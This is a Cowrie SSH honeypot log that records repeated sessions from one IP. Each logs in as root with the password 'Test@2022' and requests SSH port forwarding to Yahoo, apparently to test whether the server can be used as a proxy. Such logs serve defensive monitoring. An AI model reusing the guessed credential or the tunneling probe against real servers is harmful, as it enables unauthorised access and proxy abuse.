{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61451,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc8efa7deefb","protocol":"ssh","message":"New connection: 213.209.150.239:61451 (1.2.3.4:22) [session: dc8efa7deefb]","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.270767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.271821Z","src_ip":"213.209.150.239","session":"dc8efa7deefb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.319152Z","src_ip":"213.209.150.239","session":"dc8efa7deefb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.554577Z","src_ip":"213.209.150.239","session":"dc8efa7deefb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":13335,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:13335","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.602658Z","session":"dc8efa7deefb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.650122Z","src_ip":"213.209.150.239","session":"dc8efa7deefb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2310,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2310","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.785536Z","session":"dc8efa7deefb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.832740Z","src_ip":"213.209.150.239","session":"dc8efa7deefb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.881067Z","src_ip":"213.209.150.239","session":"dc8efa7deefb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61494,"dst_ip":"1.2.3.4","dst_port":22,"session":"fed3ca8d10c0","protocol":"ssh","message":"New connection: 213.209.150.239:61494 (1.2.3.4:22) [session: fed3ca8d10c0]","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.936365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.937690Z","src_ip":"213.209.150.239","session":"fed3ca8d10c0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.994380Z","src_ip":"213.209.150.239","session":"fed3ca8d10c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.276163Z","src_ip":"213.209.150.239","session":"fed3ca8d10c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11781,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11781","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.333569Z","session":"fed3ca8d10c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.390308Z","src_ip":"213.209.150.239","session":"fed3ca8d10c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27844,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27844","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.546946Z","session":"fed3ca8d10c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.603624Z","src_ip":"213.209.150.239","session":"fed3ca8d10c0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.660776Z","src_ip":"213.209.150.239","session":"fed3ca8d10c0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61540,"dst_ip":"1.2.3.4","dst_port":22,"session":"614f1dca7953","protocol":"ssh","message":"New connection: 213.209.150.239:61540 (1.2.3.4:22) [session: 614f1dca7953]","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.706975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.707804Z","src_ip":"213.209.150.239","session":"614f1dca7953"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.754751Z","src_ip":"213.209.150.239","session":"614f1dca7953"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:43.990074Z","src_ip":"213.209.150.239","session":"614f1dca7953"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":19000,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19000","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.037939Z","session":"614f1dca7953"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.085379Z","src_ip":"213.209.150.239","session":"614f1dca7953"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28225,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28225","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.221617Z","session":"614f1dca7953"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.268645Z","src_ip":"213.209.150.239","session":"614f1dca7953"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.316802Z","src_ip":"213.209.150.239","session":"614f1dca7953"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61571,"dst_ip":"1.2.3.4","dst_port":22,"session":"b246e8eba23a","protocol":"ssh","message":"New connection: 213.209.150.239:61571 (1.2.3.4:22) [session: b246e8eba23a]","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.362891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.363688Z","src_ip":"213.209.150.239","session":"b246e8eba23a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.411102Z","src_ip":"213.209.150.239","session":"b246e8eba23a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.646250Z","src_ip":"213.209.150.239","session":"b246e8eba23a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":13755,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13755","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.695551Z","session":"b246e8eba23a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.742794Z","src_ip":"213.209.150.239","session":"b246e8eba23a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10738,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10738","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.877640Z","session":"b246e8eba23a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.925068Z","src_ip":"213.209.150.239","session":"b246e8eba23a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:44.973498Z","src_ip":"213.209.150.239","session":"b246e8eba23a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61626,"dst_ip":"1.2.3.4","dst_port":22,"session":"df9485581e1a","protocol":"ssh","message":"New connection: 213.209.150.239:61626 (1.2.3.4:22) [session: df9485581e1a]","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.028968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.030160Z","src_ip":"213.209.150.239","session":"df9485581e1a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.086949Z","src_ip":"213.209.150.239","session":"df9485581e1a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.369289Z","src_ip":"213.209.150.239","session":"df9485581e1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":12490,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:12490","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.427388Z","session":"df9485581e1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.483967Z","src_ip":"213.209.150.239","session":"df9485581e1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":8994,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8994","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.639127Z","session":"df9485581e1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.696170Z","src_ip":"213.209.150.239","session":"df9485581e1a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.753800Z","src_ip":"213.209.150.239","session":"df9485581e1a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61664,"dst_ip":"1.2.3.4","dst_port":22,"session":"5302df5ef067","protocol":"ssh","message":"New connection: 213.209.150.239:61664 (1.2.3.4:22) [session: 5302df5ef067]","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.808923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.810373Z","src_ip":"213.209.150.239","session":"5302df5ef067"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ct